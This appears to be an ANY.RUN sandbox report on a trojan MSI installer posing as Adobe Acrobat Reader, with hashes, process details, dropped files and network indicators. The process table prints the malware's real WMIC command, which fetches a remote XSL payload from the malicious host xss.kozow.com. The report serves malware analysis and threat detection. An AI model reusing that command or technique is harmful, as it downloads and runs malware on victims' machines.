analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Danfe-NF.msi

Full analysis: https://app.any.run/tasks/9bcb495f-db7e-429d-8761-0adfcc2d9ded
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Analysis date: January 17, 2019, 14:13:26
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
generated-doc
trojan
Indicators:
MIME: application/x-msi
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {0FD82FCE-09F4-4952-A945-B24B494F8F27}, Number of Words: 10, Subject: Adobe Acrobat Reader, Author: Adobe Acrobat Reader, Name of Creating Application: Advanced Installer 12.2.1 build 64247, Template: ;1033
MD5:

A811534A062F71C7EC94B45CAFF86ABA

SHA1:

629CC926D9154A424CBF85D76EC11523B08D8C1A

SHA256:

9111120D6B8550ABED6A51557686BB98E6F0B37C5490524100948DADDD31E27B

SSDEEP:

3072:6c6bv77sFsZI9zt753DCY5AUwgz88ereWn/7w05g08MMcB3RUN46ILJ9+ZB5yOaz:65sHX3DCY5AF8er1nzT0rXK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 2372)
  • INFO

    • Application launched itself

      • msiexec.exe (PID: 2372)
    • Starts application with an unusual extension

      • MsiExec.exe (PID: 3456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msi | Microsoft Windows Installer (88.6)
.mst | Windows SDK Setup Transform Script (10)
.msi | Microsoft Installer (100)

EXIF

FlashPix

Title: Installation Database
Keywords: Installer, MSI, Database
Comments: -
LastPrinted: 2009:12:11 11:47:44
CreateDate: 2009:12:11 11:47:44
ModifyDate: 2009:12:11 11:47:44
Pages: 200
Security: None
CodePage: Windows Latin 1 (Western European)
RevisionNumber: {0FD82FCE-09F4-4952-A945-B24B494F8F27}
Words: 10
Subject: Adobe Acrobat Reader
Author: Adobe Acrobat Reader
LastModifiedBy: -
Software: Advanced Installer 12.2.1 build 64247
Template: ;1033
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
5
Malicious processes
0
Suspicious processes
0

Behavior graph

Click at the process to see the details
start msiexec.exe no specs msiexec.exe msiexec.exe wmic.exe lcf04f.tmp no specs

Process information

PID
CMD
Path
Indicators
Parent process
2984"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\Danfe-NF.msi"C:\Windows\System32\msiexec.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
2372C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3456C:\Windows\system32\MsiExec.exe -Embedding A71BE9DB8A724E170EFCBAB186D4DF63C:\Windows\system32\MsiExec.exe
msiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
3468"C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"https://xss.kozow.com/xls/bm8tcG93ZXImaHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9maWxlc3BlZHJpbmhvL3QwaXJnbm1vcWkuYm1wJmV5cUt5c0JSeWNmb0pCSA=="C:\Windows\System32\Wbem\WMIC.exe
MsiExec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
44210
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2524"C:\Users\admin\AppData\Local\Temp\lcF04F.tmp"C:\Users\admin\AppData\Local\Temp\lcF04F.tmpMsiExec.exe
User:
admin
Company:
Caphyon LTD
Integrity Level:
MEDIUM
Description:
Executable that detects if running in a virtual machine
Exit code:
0
Version:
12.2.1.0
Total events
417
Read events
350
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
2372msiexec.exeC:\Windows\Installer\MSIF011.tmp
MD5:
SHA256:
2372msiexec.exeC:\Windows\Installer\MSIF031.tmp
MD5:
SHA256:
2372msiexec.exeC:\Windows\Installer\MSIF051.tmp
MD5:
SHA256:
3456MsiExec.exeC:\Users\admin\AppData\Local\Temp\lcF04F.tmp
MD5:
SHA256:
2372msiexec.exeC:\Windows\Installer\MSIF16C.tmp
MD5:
SHA256:
2372msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF8848A8810134F1BE.TMP
MD5:
SHA256:
2372msiexec.exeC:\Windows\Installer\20ebbe.ipi
MD5:
SHA256:
2372msiexec.exeC:\Windows\Installer\MSIF1F9.tmp
MD5:
SHA256:
2372msiexec.exeC:\Config.Msi\20ebbf.rbs
MD5:
SHA256:
2372msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF1BBC3F1127AF68D6.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
4
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3456
MsiExec.exe
216.58.205.228:80
www.google.com
Google Inc.
US
whitelisted
3456
MsiExec.exe
35.239.189.49:443
xss.kozow.com
US
malicious
3468
WMIC.exe
35.239.189.49:443
xss.kozow.com
US
malicious

DNS requests

Domain
IP
Reputation
xss.kozow.com
  • 35.239.189.49
malicious
www.google.com
  • 216.58.205.228
whitelisted
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info